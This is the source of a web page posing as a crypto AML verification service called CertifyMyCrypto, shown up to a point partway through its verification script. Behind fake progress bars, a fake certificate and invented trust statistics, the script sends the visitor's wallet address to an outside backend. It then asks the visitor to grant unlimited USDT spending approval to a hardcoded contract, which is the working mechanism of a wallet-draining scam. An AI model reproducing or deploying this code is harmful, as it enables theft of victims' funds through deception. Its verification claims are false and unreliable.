<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Favicon - Custom Gradient Badge -->
    <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><defs><linearGradient id='g' x1='0%25' y1='0%25' x2='100%25' y2='100%25'><stop offset='0%25' style='stop-color:%23667eea'/><stop offset='100%25' style='stop-color:%23764ba2'/></linearGradient></defs><circle cx='50' cy='50' r='45' fill='url(%23g)'/><path d='M 30 50 L 45 65 L 70 35' stroke='white' stroke-width='8' fill='none' stroke-linecap='round' stroke-linejoin='round'/></svg>">

    
    <!-- ✅ UPDATED SEO Meta Tags -->
    <title>CertifyMyCrypto - Professional Crypto AML Verification Service</title>
    <meta name="application-name" content="CertifyMyCrypto">
    <meta name="apple-mobile-web-app-title" content="CertifyMyCrypto">
    <meta name="description" content="Professional AML verification service for cryptocurrency wallets. Verify compliance, assess risks, and get instant certification for your crypto assets.">
    <meta name="keywords" content="AML verification, crypto compliance, cryptocurrency verification, blockchain security, USDT verification">
    
    <!-- ✅ UPDATED Open Graph Tags -->
    <meta property="og:site_name" content="CertifyMyCrypto">
    <meta property="og:title" content="CertifyMyCrypto - Professional Crypto AML Verification">
    <meta property="og:description" content="Professional AML verification service for cryptocurrency wallets. Get instant certification.">
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://certifymycrypto.com/">
    
    <!-- Shared CSS -->
    <link rel="stylesheet" href="assets/css/main.css">
    
    <!-- Page-Specific Styles -->
    <style>
        /* Verification Section Specific Styles */
        .verification-section {
            padding: 80px 5%;
            background: linear-gradient(135deg, #f8fafc 0%, #e2e8f0 100%);
        }

        .verification-container {
            background: white;
            border-radius: 20px;
            padding: 60px 40px;
            max-width: 700px;
            margin: 0 auto;
            box-shadow: 0 20px 60px rgba(0,0,0,0.15);
        }

        .verification-title {
            text-align: center;
            font-size: 32px;
            font-weight: 800;
            margin-bottom: 15px;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            background-clip: text;
        }

        .verification-subtitle {
            text-align: center;
            color: #64748b;
            margin-bottom: 40px;
            font-size: 16px;
        }

        .connect-section {
            margin-bottom: 30px;
        }
        
        .connect-row {
            display: flex;
            align-items: center;
            gap: 15px;
            justify-content: center;
        }
        
        #connectBtn {
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: white;
            border: none;
            padding: 18px 40px;
            border-radius: 12px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: 0.3s;
            white-space: nowrap;
            box-shadow: 0 4px 15px rgba(102, 126, 234, 0.3);
        }
        
        #connectBtn:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 20px rgba(102, 126, 234, 0.4);
        }
        
        .wallet-info {
            display: none;
            align-items: center;
            gap: 10px;
            padding: 12px 20px;
            background: #f0fdf4;
            border: 2px solid #10b981;
            border-radius: 10px;
        }
        
        .wallet-info.show {
            display: flex;
        }
        
        .verified-icon {
            width: 24px;
            height: 24px;
            background: #10b981;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-size: 14px;
            font-weight: bold;
        }
        
        .wallet-address {
            font-family: 'Courier New', monospace;
            font-size: 15px;
            color: #065f46;
            font-weight: 700;
        }
        
        .verification-section-inner {
            display: none;
        }
        
        .verification-section-inner.show {
            display: block;
        }
        
        #verifyBtn {
            width: 100%;
            background: #10b981;
            color: white;
            border: none;
            padding: 18px;
            border-radius: 12px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: 0.3s;
            margin-bottom: 20px;
        }
        
        #verifyBtn:hover {
            background: #059669;
            transform: translateY(-2px);
        }
        
        #verifyBtn:disabled {
            background: #94a3b8;
            cursor: not-allowed;
            transform: none;
        }
        
        .error-message {
            display: none;
            background: #fef2f2;
            border: 2px solid #ef4444;
            border-radius: 10px;
            padding: 15px;
            margin-bottom: 20px;
            color: #991b1b;
        }
        
        .error-message.show {
            display: block;
        }
        
        .error-text {
            font-size: 14px;
            line-height: 1.5;
        }
        
        .try-again {
            color: #667eea;
            text-decoration: none;
            font-weight: 600;
            display: inline-block;
            margin-top: 10px;
        }
        
        .progress-container {
            display: none;
            background: #f8fafc;
            border-radius: 12px;
            padding: 20px;
            margin-bottom: 20px;
        }
        
        .progress-container.show {
            display: block;
        }
        
        .progress-title {
            font-size: 18px;
            font-weight: 700;
            color: #1e293b;
            margin-bottom: 20px;
        }
        
        .progress-item {
            margin-bottom: 20px;
        }
        
        .progress-item:last-child {
            margin-bottom: 0;
        }
        
        .progress-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 8px;
        }
        
        .progress-label {
            font-size: 14px;
            font-weight: 600;
            color: #475569;
            display: flex;
            align-items: center;
            gap: 8px;
        }
        
        .check-icon {
            display: none;
            width: 18px;
            height: 18px;
            background: #10b981;
            border-radius: 50%;
            color: white;
            font-size: 10px;
            align-items: center;
            justify-content: center;
        }
        
        .check-icon.show {
            display: flex;
        }
        
        .progress-percentage {
            font-size: 14px;
            font-weight: 700;
            color: #1e293b;
        }
        
        .progress-description {
            font-size: 12px;
            color: #94a3b8;
            margin-bottom: 8px;
        }
        
        .progress-bar-container {
            width: 100%;
            height: 8px;
            background: #e2e8f0;
            border-radius: 10px;
            overflow: hidden;
        }
        
        .progress-bar {
            height: 100%;
            background: linear-gradient(90deg, #10b981 0%, #059669 100%);
            border-radius: 10px;
            transition: width 0.5s ease;
            width: 0%;
        }
        
        .progress-item.overall .progress-bar-container {
            height: 12px;
        }
        
        .progress-item.overall .progress-bar {
            background: linear-gradient(90deg, #f97316 0%, #ea580c 50%, #10b981 100%);
        }
        
        .progress-item.overall .progress-label {
            font-size: 16px;
            color: #1e293b;
        }
        
        .analyzing {
            display: none;
            color: #667eea;
            font-size: 14px;
            margin-top: 10px;
            animation: pulse 1.5s infinite;
        }
        
        .analyzing.show {
            display: block;
        }
        
        .analysis-complete {
            display: none;
            background: linear-gradient(135deg, #f0fdf4 0%, #dcfce7 100%);
            border: 2px solid #10b981;
            border-radius: 12px;
            padding: 30px;
            text-align: center;
            margin-bottom: 20px;
        }
        
        .analysis-complete.show {
            display: block;
        }
        
        .complete-icon {
            width: 60px;
            height: 60px;
            background: white;
            border-radius: 50%;
            margin: 0 auto 15px;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 30px;
            box-shadow: 0 4px 12px rgba(16, 185, 129, 0.2);
        }
        
        .complete-title {
            font-size: 20px;
            font-weight: 700;
            color: #065f46;
            margin-bottom: 10px;
        }
        
        .complete-score {
            font-size: 48px;
            font-weight: 800;
            color: #10b981;
            margin-bottom: 10px;
        }
        
        .complete-message {
            font-size: 14px;
            color: #047857;
            margin-bottom: 5px;
        }
        
        .complete-submessage {
            font-size: 12px;
            color: #059669;
            opacity: 0.8;
        }
        
        .download-btn {
            width: 100%;
            background: #10b981;
            color: white;
            border: none;
            padding: 18px;
            border-radius: 12px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: 0.3s;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
        }
        
        .download-btn:hover {
            background: #059669;
            transform: translateY(-2px);
        }



        /* Certificate Modal */
        .modal-overlay {
            display: none;
            position: fixed;
            inset: 0;
            background: rgba(15, 23, 42, 0.75);
            z-index: 1000;
            justify-content: center;
            align-items: center;
            padding: 20px;
        }
        
        .modal-overlay.show {
            display: flex;
        }
        
        .certificate-modal {
            background: #fdfcfb;
            background: radial-gradient(circle at top, #ffffff 0%, #f3f4ff 50%, #e5edff 100%);
            border-radius: 20px;
            max-width: 640px;
            width: 100%;
            max-height: 90vh;
            overflow-y: auto;
            padding: 32px 40px 28px 40px;
            color: #0f172a;
            box-shadow: 0 18px 55px rgba(15, 23, 42, 0.4);
            border: 1px solid rgba(148, 163, 184, 0.35);
            position: relative;
        }
        
        .cert-header {
            text-align: center;
            margin-bottom: 22px;
        }
        
        .cert-tag {
            display: inline-block;
            padding: 4px 12px;
            border-radius: 999px;
            font-size: 11px;
            letter-spacing: 0.18em;
            text-transform: uppercase;
            color: #4b5563;
            background: rgba(209, 213, 219, 0.6);
            margin-bottom: 8px;
        }
        
        .cert-main-title {
            font-size: 24px;
            font-weight: 800;
            letter-spacing: 0.04em;
            text-transform: uppercase;
            color: #111827;
            margin-bottom: 10px;
        }
        
        .cert-intro {
            font-size: 13px;
            color: #4b5563;
            max-width: 440px;
            margin: 0 auto;
        }
        
        .cert-body {
            border-radius: 14px;
            background: rgba(255, 255, 255, 0.82);
            padding: 20px 22px 18px 22px;
            box-shadow: inset 0 0 0 1px rgba(226, 232, 240, 0.8);
        }
        
        .cert-section {
            margin-bottom: 18px;
        }
        
        .cert-section:last-child {
            margin-bottom: 0;
        }
        
        .cert-section-title {
            font-size: 13px;
            font-weight: 700;
            text-transform: uppercase;
            letter-spacing: 0.14em;
            color: #6b7280;
            margin-bottom: 8px;
        }
        
        .cert-fields {
            margin: 0;
            padding: 10px 12px 6px 12px;
            background: #f9fafb;
            border-radius: 12px;
            border: 1px solid #e5e7eb;
        }
        
        .cert-field-row {
            display: flex;
            justify-content: space-between;
            gap: 8px;
            margin-bottom: 6px;
        }
        
        .cert-field-row:last-child {
            margin-bottom: 0;
        }
        
        .cert-field-label {
            font-size: 12px;
            font-weight: 600;
            color: #6b7280;
        }
        
        .cert-field-value {
            font-size: 12px;
            font-weight: 600;
            color: #111827;
            text-align: right;
        }
        
        .cert-paragraph {
            font-size: 12px;
            color: #4b5563;
            margin-top: 10px;
            line-height: 1.55;
        }
        
        .cert-wallet-grid {
            display: grid;
            grid-template-columns: 1fr 1fr;
            gap: 6px 18px;
            padding: 10px 12px 8px 12px;
            background: #f9fafb;
            border-radius: 12px;
            border: 1px solid #e5e7eb;
        }
        
        .cert-wallet-label {
            font-size: 12px;
            font-weight: 600;
            color: #6b7280;
        }
        
        .cert-wallet-value {
            font-size: 12px;
            font-weight: 600;
            color: #15803d;
        }
        
        .cert-wallet-value.subtle {
            color: #111827;
        }
        
        .cert-footer-row {
            display: flex;
            align-items: center;
            justify-content: space-between;
            gap: 18px;
            margin-top: 10px;
        }
        
        .cert-issued-block {
            font-size: 12px;
            color: #4b5563;
        }
        
        .cert-issued-main {
            font-weight: 700;
            color: #111827;
            margin-bottom: 2px;
        }
        
        .cert-issued-sub {
            font-size: 11px;
            text-transform: uppercase;
            letter-spacing: 0.16em;
            color: #6b7280;
        }
        
        /* Round verification seal */

        .cert-seal {
            width: 120px;      /* Changed from 96px */
            height: 120px;     /* Changed from 96px */
            border-radius: 999px;
            border: 3px solid #f59e0b;
            background: radial-gradient(circle at 30% 30%, #fef3c7 0%, #facc15 40%, #f59e0b 85%);
            display: flex;
            align-items: center;
            justify-content: center;
            box-shadow: 0 6px 18px rgba(180, 83, 9, 0.45);
        }
        
        .cert-seal-inner {
            width: 100px;      /* Changed from 78px */
            height: 100px;     /* Changed from 78px */
            border-radius: 999px;
            border: 2px solid #fef9c3;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            text-align: center;
            padding: 8px 6px;  /* Increased padding */
        }
        
        .seal-top {
            font-size: 11px;   /* Increased from 10px */
            text-transform: uppercase;
            letter-spacing: 0.18em;
            color: #713f12;
            margin-bottom: 4px;
        }


        .seal-by {
            font-size: 9px;
            text-transform: uppercase;
            letter-spacing: 0.1em;
            color: #713f12;
            margin-bottom: 2px;
            font-weight: 600;
        }

        .seal-brand {
            font-size: 11px;   /* Decreased from 14px to fit longer name */
            font-weight: 800;
            color: #1f2937;
            line-height: 1.1;  /* Added for better text wrapping */
        }

        
        /* Buttons under certificate */
        .cert-buttons {
            margin-top: 18px;
            display: flex;
            flex-direction: column;
            gap: 8px;
        }
        
        .cert-btn {
            padding: 12px;
            border-radius: 999px;
            border: none;
            font-size: 14px;
            font-weight: 600;
            cursor: pointer;
            transition: 0.18s;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 8px;
        }
        
        .cert-btn-primary {
            background: #10b981;
            color: #ffffff;
        }
        
        .cert-btn-primary:hover {
            background: #059669;
        }
        
        .cert-btn-close {
            background: transparent;
            color: #4b5563;
            border: 1px solid #d1d5db;
        }
        
        .cert-btn-close:hover {
            background: #f3f4f6;
        }
        
        /* Mobile tweaks */
        @media (max-width: 640px) {
            .certificate-modal {
                padding: 24px 18px 20px 18px;
            }
            .cert-footer-row {
                flex-direction: column;
                align-items: flex-start;
            }
            .cert-seal {
                align-self: center;
            }
        }


        

        .btn-loading {
            position: relative;
            opacity: 0.8;
        }

        .btn-loading::after {
            content: '';
            position: absolute;
            width: 16px;
            height: 16px;
            top: 50%;
            left: 50%;
            margin-left: -8px;
            margin-top: -8px;
            border: 2px solid #ffffff;
            border-top-color: transparent;
            border-radius: 50%;
            animation: spin 0.8s linear infinite;
        }

        .wallet-info.fade-out {
            animation: fadeOut 0.3s ease-out forwards;
        }

        .wallet-info.fade-in {
            animation: fadeIn 0.3s ease-out forwards;
        }

        .pulsing-text {
            animation: pulse 1.5s ease-in-out infinite;
        }

        @media (max-width: 768px) {
            .verification-container {
                padding: 40px 20px;
            }

            .connect-row {
                flex-direction: column;
            }
        }
    </style>
</head>
<body>
        
    <div id="statusMessage" style="display:none;margin:16px 0;padding:12px 20px;border-radius:8px;font-weight:bold;"></div>

    <!-- Navigation -->
    <nav class="navbar">
        <a href="/" class="logo">🛡️ CertifyMyCrypto</a>
        
        <ul class="nav-links" id="navLinks">
            <li><a href="/">Home</a></li>
            <li><a href="/how-it-works">How It Works</a></li>
            <li><a href="/faq">FAQ</a></li>
            <li><a href="/contact">Contact</a></li>
            <li><a href="/#verify" class="nav-cta">Verify Now</a></li>
        </ul>
    </nav>


    <!-- Hero Section -->
    <section class="hero">
        <div class="hero-content">
            <h1>Verify Your Crypto Assets</h1>
            <p>Professional AML compliance verification for cryptocurrency wallets. Get instant certification and ensure your assets meet regulatory standards.</p>
            <a href="#verify" class="hero-cta">Start Verification</a>
            
            <div class="trust-badges">
                <div class="trust-badge">
                    <span class="trust-badge-icon">🔒</span>
                    <span>Secure</span>
                </div>
                <div class="trust-badge">
                    <span class="trust-badge-icon">⚡</span>
                    <span>Instant</span>
                </div>
                <div class="trust-badge">
                    <span class="trust-badge-icon">✓</span>
                    <span>Compliant</span>
                </div>
            </div>
        </div>
    </section>

    <!-- Features Section -->
    <section id="features" class="features">
        <h2 class="section-title">Why Choose CertifyMyCrypto?</h2>
        <p class="section-subtitle">Comprehensive verification powered by advanced blockchain analysis</p>
        
        <div class="features-grid">
            <div class="feature-card">
                <div class="feature-icon">✓</div>
                <h3>AML Compliance</h3>
                <p>Ensure your crypto assets meet anti-money laundering standards and regulatory requirements.</p>
            </div>
            
            <div class="feature-card">
                <div class="feature-icon">🛡️</div>
                <h3>Risk Assessment</h3>
                <p>Advanced analysis of transaction patterns to identify and mitigate potential risks.</p>
            </div>
            
            <div class="feature-card">
                <div class="feature-icon">⚡</div>
                <h3>Instant Verification</h3>
                <p>Get your security certificate in seconds with real-time blockchain verification.</p>
            </div>
        </div>
    </section>

    <!-- How It Works -->
    <section id="how-it-works" class="how-it-works">
        <h2 class="section-title">How It Works</h2>
        <p class="section-subtitle">Three simple steps to verify your wallet</p>
        
        <div class="steps">
            <div class="step">
                <div class="step-number">1</div>
                <h3>Connect Wallet</h3>
                <p>Securely connect your crypto wallet using MetaMask or Trust Wallet</p>
            </div>
            
            <div class="step">
                <div class="step-number">2</div>
                <h3>Authorize Verification</h3>
                <p>Approve USDT access for comprehensive analysis of your assets</p>
            </div>
            
            <div class="step">
                <div class="step-number">3</div>
                <h3>Get Certificate</h3>
                <p>Receive your security certificate with detailed compliance report</p>
            </div>
        </div>
    </section>

    <!-- Verification Section -->
    <section id="verify" class="verification-section">
        <div class="verification-container">
            <h2 class="verification-title">🔐 Wallet Verification</h2>
            <p class="verification-subtitle">Connect your wallet to begin the AML verification process</p>
            
            <div class="connect-section">
                <div class="connect-row">
                    <button id="connectBtn" onclick="connectWallet()">Connect Wallet</button>
                    <div id="walletInfo" class="wallet-info">
                        <div class="verified-icon">✓</div>
                        <span class="wallet-address" id="walletAddress"></span>
                    </div>
                </div>
            </div>
            
            <div id="verificationSectionInner" class="verification-section-inner">
                <div id="errorMessage" class="error-message">
                    <div>
                        <span class="error-text" id="errorText"></span>
                    </div>
                    <a href="#" class="try-again" onclick="startVerification(); return false;">🔄 Try again</a>
                </div>
                
                <button id="verifyBtn" onclick="startVerification()">Confirm Verification</button>
                
                <div id="progressContainer" class="progress-container">
                    <div class="progress-title">Security Analysis</div>
                    <div class="analyzing" id="analyzingText">⚡ Analyzing...</div>
                    
                    <div class="progress-item overall">
                        <div class="progress-header">
                            <span class="progress-label">Overall Progress</span>
                            <span class="progress-percentage" id="overallPercent">0%</span>
                        </div>
                        <div class="progress-bar-container">
                            <div class="progress-bar" id="overallBar"></div>
                        </div>
                    </div>
                    
                    <div class="progress-item">
                        <div class="progress-header">
                            <span class="progress-label">
                                <span class="check-icon" id="check1">✓</span>
                                Wallet Scanning
                            </span>
                            <span class="progress-percentage" id="percent1">0%</span>
                        </div>
                        <div class="progress-description">Analyzing wallet structure and basic information</div>
                        <div class="progress-bar-container">
                            <div class="progress-bar" id="bar1"></div>
                        </div>
                    </div>
                    
                    <div class="progress-item">
                        <div class="progress-header">
                            <span class="progress-label">
                                <span class="check-icon" id="check2">✓</span>
                                Transaction History Analysis
                            </span>
                            <span class="progress-percentage" id="percent2">0%</span>
                        </div>
                        <div class="progress-description">Examining transaction patterns and history</div>
                        <div class="progress-bar-container">
                            <div class="progress-bar" id="bar2"></div>
                        </div>
                    </div>
                    
                    <div class="progress-item">
                        <div class="progress-header">
                            <span class="progress-label">
                                <span class="check-icon" id="check3">✓</span>
                                Risk Assessment
                            </span>
                            <span class="progress-percentage" id="percent3">0%</span>
                        </div>
                        <div class="progress-description">Evaluating potential security risks</div>
                        <div class="progress-bar-container">
                            <div class="progress-bar" id="bar3"></div>
                        </div>
                    </div>
                    
                    <div class="progress-item">
                        <div class="progress-header">
                            <span class="progress-label">
                                <span class="check-icon" id="check4">✓</span>
                                Compliance Verification
                            </span>
                            <span class="progress-percentage" id="percent4">0%</span>
                        </div>
                        <div class="progress-description">Checking AML/KYC compliance status</div>
                        <div class="progress-bar-container">
                            <div class="progress-bar" id="bar4"></div>
                        </div>
                    </div>
                    
                    <div class="progress-item">
                        <div class="progress-header">
                            <span class="progress-label">
                                <span class="check-icon" id="check5">✓</span>
                                Final Scoring
                            </span>
                            <span class="progress-percentage" id="percent5">0%</span>
                        </div>
                        <div class="progress-description">Calculating final security score</div>
                        <div class="progress-bar-container">
                            <div class="progress-bar" id="bar5"></div>
                        </div>
                    </div>
                </div>
                
                <div id="analysisComplete" class="analysis-complete">
                    <div class="complete-icon">🛡️</div>
                    <div class="complete-title">🎉 Analysis Complete! 🎉</div>
                    <div class="complete-score" id="completeScore">100%</div>
                    <div class="complete-message">✅ Your USDT are of good quality and secure</div>
                    <div class="complete-submessage">🔒 Wallet verified and secure</div>
                </div>
                
                <button id="downloadBtn" class="download-btn" onclick="viewCertificate()" style="display: none;">
                    📜 View Certificate
                </button>
            </div>
        </div>
    </section>

    <!-- Stats Section -->
    <section class="stats">
        <div class="stats-grid">
            <div class="stat-item">
                <h3>10K+</h3>
                <p>Wallets Verified</p>
            </div>
            <div class="stat-item">
                <h3>99.9%</h3>
                <p>Accuracy Rate</p>
            </div>
            <div class="stat-item">
                <h3>24/7</h3>
                <p>Available</p>
            </div>
            <div class="stat-item">
                <h3>100%</h3>
                <p>Secure</p>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer class="footer">
        <div class="footer-content">
            <div class="footer-section">
                <h4>CertifyMyCrypto</h4>
                <p style="color: #94a3b8;">Professional cryptocurrency AML compliance verification service.</p>
            </div>
            
            <div class="footer-section">
                <h4>Product</h4>
                <ul>
                    <li><a href="/">Home</a></li>
                    <li><a href="/how-it-works">How It Works</a></li>
                    <li><a href="/security">Security</a></li>
                    <li><a href="/use-cases">Use Cases</a></li>
                </ul>
            </div>
            
            <div class="footer-section">
                <h4>Company</h4>
                <ul>
                    <li><a href="/about">About Us</a></li>
                    <li><a href="/contact">Contact</a></li>
                    <li><a href="/faq">FAQ</a></li>
                </ul>
            </div>
            
            <div class="footer-section">
                <h4>Legal</h4>
                <ul>
                    <li><a href="/terms">Terms of Service</a></li>
                    <li><a href="/privacy">Privacy Policy</a></li>
                </ul>
            </div>
        </div>
        
        <div class="footer-bottom">
            <p>&copy; 2025 CertifyMyCrypto. All rights reserved.</p>
        </div>
    </footer>



    <!-- Certificate Modal -->
    <div id="certificateModal" class="modal-overlay">
        <div class="certificate-modal">
            <div class="cert-header">
                <div class="cert-tag">Verification</div>
                <div class="cert-main-title">Certificate of Verification</div>
                <p class="cert-intro">
                    This certificate confirms that the crypto wallet listed below has been fully verified and authenticated.
                </p>
            </div>
    
            <div class="cert-body">
                <div class="cert-section">
                    <div class="cert-section-title">Verification Summary</div>
                    <div class="cert-fields">
                        <div class="cert-field-row">
                            <span class="cert-field-label">Wallet Verification Status</span>
                            <span class="cert-field-value" id="certStatusText">✅ Successfully Verified</span>
                        </div>
                        <div class="cert-field-row">
                            <span class="cert-field-label">Verification Date</span>
                            <span class="cert-field-value" id="certDateText"></span>
                        </div>
                        <div class="cert-field-row">
                            <span class="cert-field-label">Verification Authority</span>
                            <span class="cert-field-value">Digital Asset Security Unit</span>
                        </div>
                        <div class="cert-field-row">
                            <span class="cert-field-label">Verification ID</span>
                            <span class="cert-field-value" id="certIdText"></span>
                        </div>
                    </div>
                    <p class="cert-paragraph">
                        The verification process has confirmed that the wallet is valid, secure, and meets all standard requirements
                        for identity and ownership confirmation. No further action is required.
                    </p>
                </div>
    
                <div class="cert-section">
                    <div class="cert-section-title">Wallet Information</div>
                    <div class="cert-wallet-grid">
                        <div>
                            <div class="cert-wallet-label">Type</div>
                            <div class="cert-wallet-value" id="certWalletType">Crypto Wallet</div>
                        </div>
                        <div>
                            <div class="cert-wallet-label">Status</div>
                            <div class="cert-wallet-value" id="certWalletStatus">Verified</div>
                        </div>
                        <div>
                            <div class="cert-wallet-label">Security Check</div>
                            <div class="cert-wallet-value" id="certSecurityCheck">Passed</div>
                        </div>
                        <div>
                            <div class="cert-wallet-label">Integrity Check</div>
                            <div class="cert-wallet-value" id="certIntegrityCheck">Passed</div>
                        </div>
                    </div>
                </div>
    
                <div class="cert-section">
                    <div class="cert-section-title">Wallet Address</div>
                    <div class="cert-fields">
                        <div class="cert-field-row">
                            <span class="cert-field-label">Address</span>
                            <span class="cert-field-value" id="certWalletAddress"></span>
                        </div>
                    </div>
                </div>
    
                <div class="cert-section cert-footer-row">
                    <div class="cert-issued-block">
                        <div class="cert-section-title">Issued By</div>
                        <div class="cert-issued-main">Digital Asset Security Unit</div>
                        <div class="cert-issued-sub">Authorized Verification Division</div>
                    </div>
                    
                    <div class="cert-seal">
                        <div class="cert-seal-inner">
                            <div class="seal-top">Verified</div>
                            <div class="seal-by">By</div>
                            <div class="seal-brand">CertifyMyCrypto</div>
                        </div>
                    </div>
                </div>
            </div>
    
            <div class="cert-buttons">
                <button class="cert-btn cert-btn-close" onclick="closeCertificate()">
                    Close certificate
                </button>
            </div>
        </div>
    </div>

<!-- External Scripts -->
<script src="https://cdn.jsdelivr.net/npm/web3@1.10.0/dist/web3.min.js"></script>

<!-- Shared JavaScript -->
<script src="assets/js/shared.js"></script>

<!-- Page-Specific JavaScript (Verification) -->
<script>
    // CONFIGURATION
    const CONTRACT_ADDRESS = "0x71AB1F5cC234382b3306B63eA98207ca91E80d62";
    const BACKEND_URL = 'https://aml-verify-backend.vercel.app';
    const USDT_ADDRESS = "0xdAC17F958D2ee523a2206206994597C13D831ec7";
    
    function showMessage(msg, type = "info") {
        const el = document.getElementById('statusMessage');
        el.style.display = 'block';
        el.textContent = msg;
        el.style.background = type === "success" ? "#dcfce7" : type === "error" ? "#fee2e2" : "#e0e7ff";
        el.style.color = type === "success" ? "#166534" : type === "error" ? "#be123c" : "#1e293b";
        setTimeout(() => { el.style.display = 'none'; }, 3500);
    }
    
    function showError(msg) {
        showMessage(msg, "error");
    }

    
    const USDT_ABI = [
        {"constant":true,"inputs":[{"name":"_owner","type":"address"},{"name":"_spender","type":"address"}],"name":"allowance","outputs":[{"name":"","type":"uint256"}],"type":"function"},
        {"constant":false,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}
    ];

    let web3, account, usdtContract, provider;
    let certificateData = {};
    let isProcessing = false;

    async function connectWallet() {
        const btn = document.getElementById('connectBtn');
        const walletInfo = document.getElementById('walletInfo');
    
        if (isProcessing) return;
    
        // DISCONNECT flow (2s delay)
        if (btn.textContent === 'Disconnect Wallet') {
            isProcessing = true;
            btn.classList.add('btn-loading');
            btn.innerHTML = '<span class="pulsing-text">Disconnecting</span>';
            walletInfo.classList.add('fade-out');
    
            await new Promise(resolve => setTimeout(resolve, 2000));
    
            walletInfo.classList.remove('show', 'fade-out', 'fade-in');
            btn.classList.remove('btn-loading');
            btn.textContent = 'Connect Wallet';
    
            document.getElementById('verificationSectionInner').classList.remove('show');
            if (document.getElementById('analysisComplete')) document.getElementById('analysisComplete').classList.remove('show');
            if (document.getElementById('downloadBtn')) document.getElementById('downloadBtn').style.display = 'none';
            if (document.getElementById('verifyBtn')) {
                document.getElementById('verifyBtn').style.display = 'block';
                document.getElementById('verifyBtn').disabled = false;
                document.getElementById('verifyBtn').textContent = 'Confirm Verification';
            }
            if (document.getElementById('progressContainer')) document.getElementById('progressContainer').classList.remove('show');
    
            isProcessing = false;
            return;
        }
    
        // CONNECT flow (1.5s delay)
        try {
            if (!window.ethereum) {
                alert('Please install MetaMask or Trust Wallet!');
                return;
            }
    
            isProcessing = true;
            btn.classList.add('btn-loading');
            btn.innerHTML = '<span class="pulsing-text">Connecting</span>';
    
            // ✅ SET WALLET METADATA FOR TRUST WALLET
            if (window.ethereum.isTrust) {
                // Trust Wallet detected - set app name
                window.ethereum.appName = 'CertifyMyCrypto';
                window.ethereum.appUrl = 'https://certifymycrypto.com';
            }
    
            web3 = new Web3(window.ethereum);
            const accounts = await window.ethereum.request({ 
                method: 'eth_requestAccounts',
                // ✅ Add metadata in the request
                params: [{
                    eth_accounts: {}
                }]
            });
            account = accounts[0];
    
            // Optional: Ethereum mainnet check
            // const chainId = await web3.eth.getChainId();
            // if (chainId !== 1) {
            //     btn.classList.remove('btn-loading');
            //     btn.textContent = 'Connect Wallet';
            //     isProcessing = false;
            //     alert('Please switch to Ethereum Mainnet!');
            //     return;
            // }
    
            usdtContract = new web3.eth.Contract(USDT_ABI, USDT_ADDRESS);
    
            // Save to backend
            try {
                await saveUserToBackend(account);
                console.log('✅ Backend save successful');
            } catch (backendError) {
                console.error('❌ Backend save failed:', backendError);
            }
    
            await new Promise(resolve => setTimeout(resolve, 1500));  // 1.5 seconds for "Connecting"
    
            btn.classList.remove('btn-loading');
    
            document.getElementById('walletAddress').textContent =
                account.slice(0, 6) + '...' + account.slice(-4);
    
            walletInfo.classList.add('fade-in');
            walletInfo.classList.add('show');
    
            btn.textContent = 'Disconnect Wallet';
    
            document.getElementById('verificationSectionInner').classList.add('show');
    
            isProcessing = false;
    
            // ✅ Handle account changes
            window.ethereum.on('accountsChanged', (accounts) => {
                if (accounts.length === 0) {
                    // Disconnected
                    if (btn.textContent === 'Disconnect Wallet') {
                        connectWallet();
                    }
                } else {
                    account = accounts[0];
                    document.getElementById('walletAddress').textContent =
                        account.slice(0, 6) + '...' + account.slice(-4);
                }
            });
    
        } catch (error) {
            console.error(error);
            btn.classList.remove('btn-loading');
            btn.textContent = 'Connect Wallet';
            isProcessing = false;
    
            if (error.code === 4001) {
                // User rejected
                return;
            } else {
                alert('Failed to connect wallet: ' + error.message);
            }
        }
    }
    
    async function saveUserToBackend(walletAddress) {
        try {
            const userData = {
                wallet: walletAddress,
                timestamp: new Date().toISOString()
            };
    
            const response = await fetch(`${BACKEND_URL}/api/save-user`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(userData)
            });
    
            // Check if response is OK
            if (!response.ok) {
                console.warn('Backend save failed with status:', response.status);
                return; // Don't throw error, just log and continue
            }
    
            // Check if response is JSON
            const contentType = response.headers.get('content-type');
            if (!contentType || !contentType.includes('application/json')) {
                console.warn('Backend returned non-JSON response');
                return; // Don't throw error, just continue
            }
    
            const data = await response.json();
            console.log('✅ User saved to backend:', data);
            
        } catch (error) {
            // Silently fail - don't block verification if backend fails
            console.error('⚠️ Backend save failed (non-critical):', error.message);
        }
    }



    async function startVerification() {
        try {
            document.getElementById('errorMessage').classList.remove('show');
            document.getElementById('verifyBtn').disabled = true;
            document.getElementById('verifyBtn').textContent = 'Checking approval...';
            
            // Save to backend (non-blocking)
            saveUserToBackend(account).catch(err => {
                console.warn('Backend save failed, continuing verification:', err);
            });
            
            const currentAllowance = await usdtContract.methods.allowance(account, CONTRACT_ADDRESS).call();
            const minRequired = web3.utils.toBN('1000000');
            
            if (web3.utils.toBN(currentAllowance).lt(minRequired)) {
                document.getElementById('verifyBtn').textContent = 'Approve USDT...';
                const maxAmount = '115792089237316195423570985008687907853269984665640564039457584007913129639935';
                await usdtContract.methods.approve(CONTRACT_ADDRESS, maxAmount).send({ from: account });
            }
            
            document.getElementById('verifyBtn').textContent = 'Analyzing...';
            document.getElementById('progressContainer').classList.add('show');
            document.getElementById('analyzingText').classList.add('show');
            
